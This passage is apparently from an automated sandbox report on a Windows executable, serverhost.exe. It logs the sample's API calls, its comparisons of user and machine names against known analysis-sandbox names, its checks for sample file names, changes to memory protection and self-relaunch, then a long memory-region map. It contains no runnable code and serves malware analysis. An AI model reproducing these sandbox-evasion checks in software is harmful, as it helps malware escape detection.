(lpAddress=0x0, dwSize=0x12000, flAllocationType=0x1000, flProtect=0x4) returned 0x440000 [0074.546] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x1cf76c | out: ProcedureAddress=0x1cf76c*=0x765e2fb6) returned 0x0 [0074.546] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x40) returned 0x420000 [0074.547] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x1cf84c | out: ProcedureAddress=0x1cf84c*=0x765e395c) returned 0x0 [0074.547] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x1cf84c | out: ProcedureAddress=0x1cf84c*=0x765e33d3) returned 0x0 [0074.548] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x1cf84c | out: ProcedureAddress=0x1cf84c*=0x765e2fb6) returned 0x0 [0074.548] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0x1cf84c | out: ProcedureAddress=0x1cf84c*=0x765d2341) returned 0x0 [0074.548] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="UnmapViewOfFile", Ordinal=0x0, ProcedureAddress=0x1cf84c | out: ProcedureAddress=0x1cf84c*=0x765ddb13) returned 0x0 [0074.548] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="AddVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x1cf84c | out: ProcedureAddress=0x1cf84c*=0x772af774) returned 0x0 [0074.548] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="RemoveVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x1cf84c | out: ProcedureAddress=0x1cf84c*=0x7731ad2e) returned 0x0 [0074.548] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76590000 [0074.548] GetProcAddress (hModule=0x76590000, lpProcName="GetModuleFileNameA") returned 0x765e33f6 [0074.548] GetProcAddress (hModule=0x76590000, lpProcName="GetComputerNameA") returned 0x765c6ba9 [0074.548] GetProcAddress (hModule=0x76590000, lpProcName="CloseHandle") returned 0x765dca7c [0074.548] GetProcAddress (hModule=0x76590000, lpProcName="lstrcmpA") returned 0x765c8c59 [0074.548] GetProcAddress (hModule=0x76590000, lpProcName="FreeConsole") returned 0x7663bfde [0074.548] GetProcAddress (hModule=0x76590000, lpProcName="GetComputerNameExA") returned 0x7661f41f [0074.548] GetProcAddress (hModule=0x76590000, lpProcName="GetModuleHandleA") returned 0x765dcf41 [0074.549] GetProcAddress (hModule=0x76590000, lpProcName="CreateFileA") returned 0x765dcee8 [0074.549] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x764f0000 [0074.549] GetProcAddress (hModule=0x764f0000, lpProcName="GetUserNameA") returned 0x7651a4b4 [0074.549] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76b40000 [0074.549] GetProcAddress (hModule=0x76b40000, lpProcName="StrStrIA") returned 0x76b4d250 [0074.549] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x772a0000 [0074.549] GetProcAddress (hModule=0x772a0000, lpProcName="strchr") returned 0x772e7690 [0074.549] GetUserNameA (in: lpBuffer=0x1cf77c, pcbBuffer=0x1cf578 | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x1cf578) returned 1 [0074.552] GetComputerNameA (in: lpBuffer=0x1cf67c, nSize=0x1cf578 | out: lpBuffer="F71GWAT", nSize=0x1cf578) returned 1 [0074.552] GetComputerNameExA (in: NameType=0x1, lpBuffer=0x1cf57c, nSize=0x1cf578 | out: lpBuffer="F71gwat", nSize=0x1cf578) returned 1 [0074.552] lstrcmpA (lpString1="F71GWAT", lpString2="TEQUILABOOMBOOM") returned -1 [0074.552] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="Wilbert") returned -1 [0074.552] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0074.552] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0074.552] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John Doe") returned -1 [0074.552] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John") returned -1 [0074.552] CreateFileA (lpFileName="C:\\email.doc" (normalized: "c:\\email.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0074.553] CloseHandle (hObject=0xffffffff) returned 0 [0074.553] CreateFileA (lpFileName="C:\\a\\foobar.bmp" (normalized: "c:\\a\\foobar.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0074.553] CloseHandle (hObject=0xffffffff) returned 0 [0074.553] GetModuleHandleA (lpModuleName=0x0) returned 0xc40000 [0074.553] GetModuleFileNameA (in: hModule=0xc40000, lpFilename=0x1cf78c, nSize=0x103 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0074.553] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpSrch="sample") returned 0x0 [0074.553] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpSrch="mlwr_smpl") returned 0x0 [0074.553] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpSrch="artifact.exe") returned 0x0 [0074.553] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x4) returned 0x460000 [0074.555] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76590000 [0074.555] GetProcAddress (hModule=0x76590000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x765c480b [0074.555] FreeConsole () returned 0 [0074.555] VirtualProtect (in: lpAddress=0x461000, dwSize=0x88aa, flNewProtect=0x20, lpflOldProtect=0x1cf874 | out: lpflOldProtect=0x1cf874*=0x4) returned 1 [0074.555] VirtualProtect (in: lpAddress=0x46a000, dwSize=0xb12, flNewProtect=0x2, lpflOldProtect=0x1cf874 | out: lpflOldProtect=0x1cf874*=0x4) returned 1 [0074.555] VirtualProtect (in: lpAddress=0x46b000, dwSize=0xbd8, flNewProtect=0x4, lpflOldProtect=0x1cf874 | out: lpflOldProtect=0x1cf874*=0x4) returned 1 [0074.555] VirtualProtect (in: lpAddress=0x46c000, dwSize=0x4dc, flNewProtect=0x2, lpflOldProtect=0x1cf874 | out: lpflOldProtect=0x1cf874*=0x4) returned 1 [0074.555] VirtualProtect (in: lpAddress=0x460000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x1cf874 | out: lpflOldProtect=0x1cf874*=0x4) returned 1 [0076.074] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf998, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0076.074] _snwprintf (in: _Dest=0x1cfba0, _Count=0x40, _Format="E%X" | out: _Dest="EA991ED3B") returned 9 [0076.074] _snwprintf (in: _Dest=0x1cfc20, _Count=0x40, _Format="M%X" | out: _Dest="MA991ED3B") returned 9 [0076.074] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="EA991ED3B") returned 0x118 [0076.074] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="MA991ED3B") returned 0x11c [0076.074] GetLastError () returned 0x0 [0076.074] CreateProcessW (in: lpApplicationName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1cfca0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cfce4 | out: lpCommandLine=0x0, lpProcessInformation=0x1cfce4*(hProcess=0x124, hThread=0x120, dwProcessId=0xc18, dwThreadId=0xc1c)) returned 1 [0076.077] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0xffffffff) returned 0x0 [0077.553] CloseHandle (hObject=0x124) returned 1 [0077.553] CloseHandle (hObject=0x120) returned 1 [0077.554] CloseHandle (hObject=0x118) returned 1 [0077.554] CloseHandle (hObject=0x11c) returned 1 [0077.554] ExitProcess (uExitCode=0x0) Thread: id = 72 os_tid = 0xc10 Thread: id = 73 os_tid = 0xc14 Process: id = "11" image_name = "serverhost.exe" filename = "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe" page_root = "0x7eef7360" os_pid = "0xc18" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0xc04" cmd_line = "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1592 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1593 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1594 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1595 start_va = 0xc40000 end_va = 0xc5afff entry_point = 0xc41d90 region_type = mapped_file name = "serverhost.exemh.exe" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exeMh.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exemh.exe") Region: id = 1596 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1597 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1598 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1599 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 1600 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1601 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1602 start_va = 0x40000 end_va = 0xa6fff entry_point = 0x40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1603 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1604 start_va = 0x470000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1605 start_va = 0x6eb50000 end_va = 0x6ebd3fff entry_point = 0x6eb519a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1606 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1607 start_va = 0x754c0000 end_va = 0x754e6fff entry_point = 0x754c58b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1608 start_va = 0x756d0000 end_va = 0x756e1fff entry_point = 0x756d1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1609 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1610 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1611 start_va = 0x758a0000 end_va = 0x764e9fff entry_point = 0x75921601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1612 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1613 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1614 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1615 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1616 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1617 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1618 start_va = 0x769a0000 end_va = 0x76b3cfff entry_point = 0x769a17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1619 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b59ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1620 start_va = 0x76ba0000 end_va = 0x76c2efff entry_point = 0x76ba3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1621 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1622 start_va = 0x77140000 end_va = 0x7729bfff entry_point = 0x7718ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1623 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1624 start_va = 0xb0000 end_va = 0x177fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 1625 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1626 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1627 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1628 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1629 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1630 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1631 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 1632 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 1633 start_va = 0x570000 end_va = 0x962fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1634 start_va = 0xc60000 end_va = 0x185ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 1635 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1636 start_va = 0x970000 end_va = 0xc3efff entry_point = 0x970000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1637 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1638 start_va = 0x742b0000 end_va = 0x7444dfff entry_point = 0x742de6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1639 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x3e0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1640 start_va = 0x3f0000 end_va = 0x3f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1641 start_va = 0x19a0000 end_va = 0x1a9ffff entry_point = 0x0 region_type = private name = "private_0x00000000019a0000" filename = "" Region: id = 1642 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1643 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1644 start_va = 0x1860000 end_va = 0x18bbfff entry_point = 0x18835b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1645 start_va = 0x1860000 end_va = 0x18bbfff entry_point = 0x18835b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1646 start_va = 0x75340000 end_va = 0x7534bfff entry_point = 0x753410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1647 start_va = 0x739d0000 end_va = 0x73a0ffff entry_point = 0x739da2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1648 start_va = 0x1aa0000 end_va = 0x1c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001aa0000" filename = "" Region: id = 1649 start_va = 0x1860000 end_va = 0x193efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001860000" filename = "" Region: id = 1650 start_va = 0x430000 end_va = 0x453fff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1651 start_va = 0x735e0000 end_va = 0x736dafff entry_point = 0x735f17e1 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 1652 start_va = 0x400000 end_va = 0x400fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1653 start_va = 0x410000 end_va = 0x418fff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1654 start_va = 0x1940000 end_va = 0x1963fff entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 1655 start_va = 0x1970000 end_va = 0x1978fff entry_point = 0x0 region_type = private name = "private_0x0000000001970000" filename = "" Region: id = 1656 start_va = 0x1aa0000 end_va = 0x1b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001aa0000" filename = "" Region: id = 1657 start_va = 0x1bd0000 end_va = 0x1c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 1658 start_va = 0x71510000 end_va = 0x7155bfff entry_point = 0x71512c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1659 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1660 start_va = 0x1c10000 end_va = 0x1c57fff entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 1661 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1662 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1663 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1664 start_va = 0x430000 end_va = 0x441fff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1665 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1666 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1667 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1668 start_va = 0x1c60000 end_va = 0x1ca7fff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 1669 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1670 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1671 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1672 start_va = 0x1940000 end_va = 0x1951fff entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 1673 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1674 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1675 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1676 start_va = 0x1960000 end_va = 0x1971fff entry_point = 0x0 region_type = private name = "private_0x0000000001960000" filename = "" Region: id = 1677 start_va = 0x410000 end_va = 0x41cfff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1678 start_va = 0x75320000 end_va = 0x7533afff entry_point = 0x753293b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1679 start_va = 0x450000 end_va = 0x45cfff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1680 start_va = 0x9ce0000 end_va = 0x9ddffff entry_point = 0x0 region_type = private name = "private_0x0000000009ce0000" filename = "" Region: id = 1681 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1682 start_va = 0x755b0000 end_va = 0x756ccfff entry_point = 0x755b158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1683 start_va = 0x75460000 end_va = 0x7546bfff entry_point = 0x7546238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1684 start_va = 0x76f00000 end_va = 0x77035fff entry_point = 0x76f01b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1685 start_va = 0x77040000 end_va = 0x77134fff entry_point = 0x77041865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1686 start_va = 0x76c60000 end_va = 0x76e5afff entry_point = 0x76c622d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1687 start_va = 0x74af0000 end_va = 0x74b06fff entry_point = 0x74af1c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1688 start_va = 0x753f0000 end_va = 0x753fafff entry_point = 0x753f1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1689 start_va = 0x74180000 end_va = 0x7418cfff entry_point = 0x741811e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1690 start_va = 0x1db0000 end_va = 0x1eaffff entry_point = 0x0 region_type = private name = 